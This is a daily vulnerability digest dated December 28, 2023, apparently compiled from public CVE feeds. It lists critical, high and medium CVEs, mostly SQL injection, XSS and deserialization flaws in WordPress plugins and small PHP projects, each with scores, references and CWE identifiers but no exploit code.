Latest vulnerabilities [Thursday, December 28, 2023]

Latest vulnerabilities [Thursday, December 28, 2023]
{{titre}}

Last update performed on 12/28/2023 at 11:57:05 PM

(2) CRITICAL VULNERABILITIES [9.0, 10.0]

Source : tenable.com

Vulnerability ID : CVE-2023-7163

First published on : 28-12-2023 16:16:02
Last modified on : 28-12-2023 19:05:29

Description :
A security issue exists in D-Link D-View 8 v2.0.2.89 and prior that could allow an attacker to manipulate the probe inventory of the D-View service. This could result in the disclosure of information from other probes, denial of service conditions due to the probe inventory becoming full, or the execution of tasks on other probes.

CVE ID : CVE-2023-7163
Source : vulnreport@tenable.com
CVSS Score : 10.0

References :
https://tenable.com/security/research/tra-2023-43 | source : vulnreport@tenable.com

Vulnerability : CWE-20


Source : patchstack.com

Vulnerability ID : CVE-2023-50839

First published on : 28-12-2023 20:16:07
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support Plugin.This issue affects JS Help Desk – Best Help Desk & Support Plugin: from n/a through 2.8.1.

CVE ID : CVE-2023-50839
Source : audit@patchstack.com
CVSS Score : 9.3

References :
https://patchstack.com/database/vulnerability/js-support-ticket/wordpress-js-help-desk-plugin-2-8-1-unauthenticated-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


(23) HIGH VULNERABILITIES [7.0, 8.9]

Source : github.com

Vulnerability ID : CVE-2023-52082

First published on : 28-12-2023 16:16:02
Last modified on : 28-12-2023 19:05:29

Description :
Lychee is a free photo-management tool. Prior to 5.0.2, Lychee is vulnerable to an SQL injection on any binding when using mysql/mariadb. This injection is only active for users with the `.env` settings set to DB_LOG_SQL=true and DB_LOG_SQL_EXPLAIN=true. The defaults settings of Lychee are safe. The patch is provided on version 5.0.2. To work around this issue, disable SQL EXPLAIN logging.

CVE ID : CVE-2023-52082
Source : security-advisories@github.com
CVSS Score : 8.8

References :
https://github.com/LycheeOrg/Lychee/commit/33354a2ce7cf700cc4ee537b7b8b94dfc1e84ad4 | source : security-advisories@github.com
https://github.com/LycheeOrg/Lychee/security/advisories/GHSA-rjwv-5j3m-p5x4 | source : security-advisories@github.com

Vulnerability : CWE-89


Source : patchstack.com

Vulnerability ID : CVE-2023-50840

First published on : 28-12-2023 19:15:14
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in wpdevelop, oplugins Booking Manager.This issue affects Booking Manager: from n/a through 2.1.5.

CVE ID : CVE-2023-50840
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/booking-manager/wordpress-booking-manager-plugin-2-1-5-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50841

First published on : 28-12-2023 19:15:14
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Repute Infosystems BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin.This issue affects BookingPress – Appointment Booking Calendar Plugin and Online Scheduling Plugin: from n/a through 1.0.72.

CVE ID : CVE-2023-50841
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/bookingpress-appointment-booking/wordpress-bookingpress-plugin-1-0-72-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50842

First published on : 28-12-2023 19:15:14
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Matthew Fries MF Gig Calendar.This issue affects MF Gig Calendar: from n/a through 1.2.1.

CVE ID : CVE-2023-50842
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/mf-gig-calendar/wordpress-mf-gig-calendar-plugin-1-2-1-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-32795

First published on : 28-12-2023 11:15:08
Last modified on : 28-12-2023 15:09:45

Description :
Deserialization of Untrusted Data vulnerability in WooCommerce Product Add-Ons.This issue affects Product Add-Ons: from n/a through 6.1.3.

CVE ID : CVE-2023-32795
Source : audit@patchstack.com
CVSS Score : 8.2

References :
https://patchstack.com/database/vulnerability/woocommerce-product-addons/wordpress-woocommerce-product-add-ons-plugin-6-1-3-authenticated-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-50856

First published on : 28-12-2023 11:15:09
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FunnelKit Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits.This issue affects Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits: from n/a through 2.14.3.

CVE ID : CVE-2023-50856
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/funnel-builder/wordpress-funnel-builder-for-wordpress-by-funnelkit-plugin-2-14-3-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50857

First published on : 28-12-2023 11:15:09
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FunnelKit Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit.This issue affects Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit: from n/a through 2.6.1.

CVE ID : CVE-2023-50857
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/wp-marketing-automations/wordpress-automation-by-funnelkit-plugin-2-6-1-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50848

First published on : 28-12-2023 12:15:42
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aaron J 404 Solution.This issue affects 404 Solution: from n/a through 2.34.0.

CVE ID : CVE-2023-50848
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/404-solution/wordpress-404-solution-plugin-2-34-0-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50849

First published on : 28-12-2023 12:15:42
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in E2Pdf.Com E2Pdf – Export To Pdf Tool for WordPress.This issue affects E2Pdf – Export To Pdf Tool for WordPress: from n/a through 1.20.23.

CVE ID : CVE-2023-50849
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/e2pdf/wordpress-e2pdf-plugin-1-20-23-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50851

First published on : 28-12-2023 12:15:43
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in N Squared Appointment Booking Calendar β€” Simply Schedule Appointments Booking Plugin.This issue affects Appointment Booking Calendar β€” Simply Schedule Appointments Booking Plugin: from n/a before 1.6.6.1.

CVE ID : CVE-2023-50851
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/simply-schedule-appointments/wordpress-simply-schedule-appointments-booking-plugin-1-6-6-1-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50852

First published on : 28-12-2023 12:15:43
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in StylemixThemes Booking Calendar | Appointment Booking | BookIt.This issue affects Booking Calendar | Appointment Booking | BookIt: from n/a through 2.4.3.

CVE ID : CVE-2023-50852
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/bookit/wordpress-bookit-plugin-2-4-3-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50853

First published on : 28-12-2023 12:15:43
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nasirahmed Advanced Form Integration – Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms.This issue affects Advanced Form Integration – Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms: from n/a through 1.75.0.

CVE ID : CVE-2023-50853
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/advanced-form-integration/wordpress-advanced-form-integration-plugin-1-75-0-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50854

First published on : 28-12-2023 12:15:43
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Squirrly Squirrly SEO - Advanced Pack.This issue affects Squirrly SEO - Advanced Pack: from n/a through 2.3.8.

CVE ID : CVE-2023-50854
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/squirrly-seo-pack/wordpress-squirrly-seo-advanced-pack-plugin-2-3-8-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50855

First published on : 28-12-2023 12:15:43
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sam Perrow Pre* Party Resource Hints.This issue affects Pre* Party Resource Hints: from n/a through 1.8.18.

CVE ID : CVE-2023-50855
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/pre-party-browser-hints/wordpress-pre-party-resource-hints-plugin-1-8-18-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50843

First published on : 28-12-2023 19:15:15
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Clockwork Clockwork SMS Notfications.This issue affects Clockwork SMS Notfications: from n/a through 3.0.4.

CVE ID : CVE-2023-50843
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/mediaburst-email-to-sms/wordpress-clockwork-sms-notfications-plugin-3-0-4-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50844

First published on : 28-12-2023 19:15:15
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in James Ward Mail logging – WP Mail Catcher.This issue affects Mail logging – WP Mail Catcher: from n/a through 2.1.3.

CVE ID : CVE-2023-50844
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/wp-mail-catcher/wordpress-wp-mail-catcher-plugin-2-1-3-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50845

First published on : 28-12-2023 19:15:15
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AyeCode - WordPress Business Directory Plugins GeoDirectory – WordPress Business Directory Plugin, or Classified Directory.This issue affects GeoDirectory – WordPress Business Directory Plugin, or Classified Directory: from n/a through 2.3.28.

CVE ID : CVE-2023-50845
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/geodirectory/wordpress-geodirectory-plugin-2-3-28-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50846

First published on : 28-12-2023 19:15:15
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RegistrationMagic RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login.This issue affects RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login: from n/a through 5.2.4.5.

CVE ID : CVE-2023-50846
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/custom-registration-form-builder-with-submission-manager/wordpress-registrationmagic-plugin-5-2-4-5-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50847

First published on : 28-12-2023 19:15:15
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Collne Inc. Welcart e-Commerce.This issue affects Welcart e-Commerce: from n/a through 2.9.3.

CVE ID : CVE-2023-50847
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-9-3-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-50838

First published on : 28-12-2023 20:16:07
Last modified on : 28-12-2023 20:21:23

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Basix NEX-Forms – Ultimate Form Builder – Contact forms and much more.This issue affects NEX-Forms – Ultimate Form Builder – Contact forms and much more: from n/a through 8.5.5.

CVE ID : CVE-2023-50838
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/nex-forms-express-wp-form-builder/wordpress-nex-forms-ultimate-form-builder-8-5-5-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-32513

First published on : 28-12-2023 11:15:08
Last modified on : 28-12-2023 15:09:45

Description :
Deserialization of Untrusted Data vulnerability in GiveWP GiveWP – Donation Plugin and Fundraising Platform.This issue affects GiveWP – Donation Plugin and Fundraising Platform: from n/a through 2.25.3.

CVE ID : CVE-2023-32513
Source : audit@patchstack.com
CVSS Score : 7.5

References :
https://patchstack.com/database/vulnerability/give/wordpress-give-donation-plugin-plugin-2-25-3-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-51501

First published on : 28-12-2023 10:15:09
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Undsgn Uncode - Creative & WooCommerce WordPress Theme allows Reflected XSS.This issue affects Uncode - Creative & WooCommerce WordPress Theme: from n/a through 2.8.6.

CVE ID : CVE-2023-51501
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/uncode-core/wordpress-uncode-core-plugin-2-8-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Source : usom.gov.tr

Vulnerability ID : CVE-2023-4671

First published on : 28-12-2023 10:15:08
Last modified on : 28-12-2023 15:09:53

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Talent Software ECOP allows Command Line Execution through SQL Injection.This issue affects ECOP: before 32255.

CVE ID : CVE-2023-4671
Source : iletisim@usom.gov.tr
CVSS Score : 7.5

References :
https://www.usom.gov.tr/bildirim/tr-23-0737 | source : iletisim@usom.gov.tr

Vulnerability : CWE-89


(26) MEDIUM VULNERABILITIES [4.0, 6.9]

Source : github.com

Vulnerability ID : CVE-2023-52079

First published on : 28-12-2023 16:16:01
Last modified on : 28-12-2023 19:05:29

Description :
msgpackr is a fast MessagePack NodeJS/JavaScript implementation. Prior to 1.10.1, when decoding user supplied MessagePack messages, users can trigger stuck threads by crafting messages that keep the decoder stuck in a loop. The fix is available in v1.10.1. Exploits seem to require structured cloning, replacing the 0x70 extension with your own (that throws an error or does something other than recursive referencing) should mitigate the issue.

CVE ID : CVE-2023-52079
Source : security-advisories@github.com
CVSS Score : 6.8

References :
https://github.com/kriszyp/msgpackr/commit/18f44f8800e2261341cdf489d1ba1e35a0133602 | source : security-advisories@github.com
https://github.com/kriszyp/msgpackr/security/advisories/GHSA-7hpj-7hhx-2fgx | source : security-advisories@github.com

Vulnerability : CWE-674
Vulnerability : CWE-754


Vulnerability ID : CVE-2023-52081

First published on : 28-12-2023 16:16:02
Last modified on : 28-12-2023 19:05:29

Description :
ffcss is a CLI interface to apply and configure Firefox CSS themes. Prior to 0.2.0, the function `lookupPreprocess()` is meant to apply some transformations to a string by disabling characters in the regex `[-_ .]`. However, due to the use of late Unicode normalization of type NFKD, it is possible to bypass that validation and re-introduce all the characters in the regex `[-_ .]`. The `lookupPreprocess()` can be easily bypassed with equivalent Unicode characters like U+FE4D (?), which would result in the omitted U+005F (_), for instance. The `lookupPreprocess()` function is only ever used to search for themes loosely (case insensitively, while ignoring dashes, underscores and dots), so the actual security impact is classified as low. This vulnerability is fixed in 0.2.0. There are no known workarounds.

CVE ID : CVE-2023-52081
Source : security-advisories@github.com
CVSS Score : 5.3

References :
https://github.com/ewen-lbh/ffcss/commit/f9c491874b858a32fcae15045f169fd7d02f90dc | source : security-advisories@github.com
https://github.com/ewen-lbh/ffcss/security/advisories/GHSA-wpmx-564x-h2mh | source : security-advisories@github.com

Vulnerability : CWE-176
Vulnerability : CWE-74


Vulnerability ID : CVE-2023-50267

First published on : 28-12-2023 16:16:01
Last modified on : 28-12-2023 19:05:29

Description :
MeterSphere is a one-stop open source continuous testing platform. Prior to 2.10.10-lts, the authenticated attackers can update resources which don't belong to him if the resource ID is known. This issue if fixed in 2.10.10-lts. There are no known workarounds.

CVE ID : CVE-2023-50267
Source : security-advisories@github.com
CVSS Score : 4.3

References :
https://github.com/metersphere/metersphere/security/advisories/GHSA-rcp4-c5p2-58v9 | source : security-advisories@github.com

Vulnerability : CWE-269
Vulnerability : CWE-639


Source : patchstack.com

Vulnerability ID : CVE-2023-36381

First published on : 28-12-2023 11:15:09
Last modified on : 28-12-2023 15:09:45

Description :
Deserialization of Untrusted Data vulnerability in Gesundheit Bewegt GmbH Zippy.This issue affects Zippy: from n/a through 1.6.5.

CVE ID : CVE-2023-36381
Source : audit@patchstack.com
CVSS Score : 6.6

References :
https://patchstack.com/database/vulnerability/zippy/wordpress-zippy-plugin-1-6-3-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-50874

First published on : 28-12-2023 10:15:08
Last modified on : 28-12-2023 15:09:53

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Darren Cooney WordPress Infinite Scroll – Ajax Load More allows Stored XSS.This issue affects WordPress Infinite Scroll – Ajax Load More: from n/a through 6.1.0.1.

CVE ID : CVE-2023-50874
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/ajax-load-more/wordpress-ajax-load-more-plugin-6-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-50859

First published on : 28-12-2023 11:15:10
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeum WP Crowdfunding allows Stored XSS.This issue affects WP Crowdfunding: from n/a through 2.1.6.

CVE ID : CVE-2023-50859
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/wp-crowdfunding/wordpress-wp-crowdfunding-plugin-2-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-50860

First published on : 28-12-2023 11:15:10
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TMS Booking for Appointments and Events Calendar – Amelia allows Stored XSS.This issue affects Booking for Appointments and Events Calendar – Amelia: from n/a through 1.0.85.

CVE ID : CVE-2023-50860
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/ameliabooking/wordpress-amelia-plugin-1-0-85-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-50836

First published on : 28-12-2023 11:15:09
Last modified on : 28-12-2023 15:09:45

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ibericode HTML Forms allows Stored XSS.This issue affects HTML Forms: from n/a through 1.3.28.

CVE ID : CVE-2023-50836
Source : audit@patchstack.com
CVSS Score : 5.9

References :
https://patchstack.com/database/vulnerability/html-forms/wordpress-html-forms-plugin-1-3-28-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-50858

First published on : 28-12-2023 11:15:10
Last modified on : 28-12-2023 15:09:45

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Bill Minozzi Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan.This issue affects Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan: from n/a through 4.34.

CVE ID : CVE-2023-50858
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/antihacker/wordpress-anti-hacker-plugin-4-34-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-27447

First published on : 28-12-2023 11:15:07
Last modified on : 28-12-2023 15:09:45

Description :
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in VeronaLabs WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc.This issue affects WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc: from n/a through 6.0.4.

CVE ID : CVE-2023-27447
Source : audit@patchstack.com
CVSS Score : 5.3

References :
https://patchstack.com/database/vulnerability/wp-sms/wordpress-wp-sms-plugin-6-0-4-sensitive-data-exposure-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2022-36399

First published on : 28-12-2023 22:15:45
Last modified on : 28-12-2023 22:15:45

Description :
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BoxyStudio Booked - Appointment Booking for WordPress | Calendars.This issue affects Booked - Appointment Booking for WordPress | Calendars: from n/a before 2.4.4.

CVE ID : CVE-2022-36399
Source : audit@patchstack.com
CVSS Score : 5.3

References :
https://patchstack.com/database/vulnerability/booked/wordpress-booked-plugin-2-4-unauth-appointment-data-exposure-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2023-50873

First published on : 28-12-2023 11:15:10
Last modified on : 28-12-2023 15:09:45

Description :
Cross-Site Request Forgery (CSRF) vulnerability in Marios Alexandrou Add Any Extension to Pages.This issue affects Add Any Extension to Pages: from n/a through 1.4.

CVE ID : CVE-2023-50873
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/add-any-extension-to-pages/wordpress-add-any-extension-to-pages-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-352


Source : vuldb.com

Vulnerability ID : CVE-2023-7123

First published on : 28-12-2023 00:15:12
Last modified on : 28-12-2023 15:09:53

Description :
A vulnerability, which was classified as critical, has been found in SourceCodester Medicine Tracking System 1.0. This issue affects some unknown processing of the file /classes/Master.php? f=save_medicine. The manipulation of the argument id/name/description leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249095.

CVE ID : CVE-2023-7123
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://medium.com/@2839549219ljk/medicine-tracking-system-sql-injection-7b0dde3a82a4 | source : cna@vuldb.com
https://vuldb.com/?ctiid.249095 | source : cna@vuldb.com
https://vuldb.com/?id.249095 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7126

First published on : 28-12-2023 14:15:44
Last modified on : 28-12-2023 15:09:45

Description :
A vulnerability classified as critical has been found in code-projects Automated Voting System 1.0. This affects an unknown part of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249129 was assigned to this vulnerability.

CVE ID : CVE-2023-7126
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/Automated_Voting_System/Automated_Voting_System-SQL_Injection-1.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249129 | source : cna@vuldb.com
https://vuldb.com/?id.249129 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7127

First published on : 28-12-2023 15:15:07
Last modified on : 28-12-2023 19:05:29

Description :
A vulnerability classified as critical was found in code-projects Automated Voting System 1.0. This vulnerability affects unknown code of the component Login. The manipulation of the argument idno leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249130 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-7127
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/Automated_Voting_System/Automated_Voting_System-SQL_Injection-2.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249130 | source : cna@vuldb.com
https://vuldb.com/?id.249130 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7128

First published on : 28-12-2023 15:15:07
Last modified on : 28-12-2023 19:05:29

Description :
A vulnerability, which was classified as critical, has been found in code-projects Voting System 1.0. This issue affects some unknown processing of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249131.

CVE ID : CVE-2023-7128
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/Voting_System/Voting_System-SQL_Injection-1.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249131 | source : cna@vuldb.com
https://vuldb.com/?id.249131 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7131

First published on : 28-12-2023 17:15:09
Last modified on : 28-12-2023 19:05:29

Description :
A vulnerability was found in code-projects Intern Membership Management System 2.0 and classified as critical. Affected by this issue is some unknown functionality of the file /user_registration/ of the component User Registration. The manipulation of the argument userName leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249134 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-7131
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/Intern_Membership_Management_System/Intern_Membership_Management_System-SQL-Injection.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249134 | source : cna@vuldb.com
https://vuldb.com/?id.249134 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7134

First published on : 28-12-2023 20:16:07
Last modified on : 28-12-2023 20:21:23

Description :
A vulnerability was found in SourceCodester Medicine Tracking System 1.0. It has been rated as critical. This issue affects some unknown processing. The manipulation of the argument page leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249137 was assigned to this vulnerability.

CVE ID : CVE-2023-7134
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://medium.com/@2839549219ljk/medicine-tracking-system-rce-vulnerability-1f009165b915 | source : cna@vuldb.com
https://vuldb.com/?ctiid.249137 | source : cna@vuldb.com
https://vuldb.com/?id.249137 | source : cna@vuldb.com

Vulnerability : CWE-24


Vulnerability ID : CVE-2023-7137

First published on : 28-12-2023 22:15:45
Last modified on : 28-12-2023 22:15:45

Description :
A vulnerability, which was classified as critical, has been found in code-projects Client Details System 1.0. Affected by this issue is some unknown functionality of the component HTTP POST Request Handler. The manipulation of the argument uemail leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249140.

CVE ID : CVE-2023-7137
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/Client_Details_System/Client_Details_System-SQL_Injection_1.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249140 | source : cna@vuldb.com
https://vuldb.com/?id.249140 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7138

First published on : 28-12-2023 22:15:45
Last modified on : 28-12-2023 22:15:45

Description :
A vulnerability, which was classified as critical, was found in code-projects Client Details System 1.0. This affects an unknown part of the file /admin of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249141 was assigned to this vulnerability.

CVE ID : CVE-2023-7138
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/h4md153v63n/CVEs/blob/main/Client_Details_System/Client_Details_System-SQL_Injection_2.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.249141 | source : cna@vuldb.com
https://vuldb.com/?id.249141 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-7129

First published on : 28-12-2023 16:16:02
Last modified on : 28-12-2023 19:05:29

Description :
A vulnerability, which was classified as critical, was found in code-projects Voting System 1.0. Affected is an unknown function of the component Voters Login. The manipulation of the argument voter leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249132.

CVE ID : CVE-2023-7129
Source : cna@vuldb.com
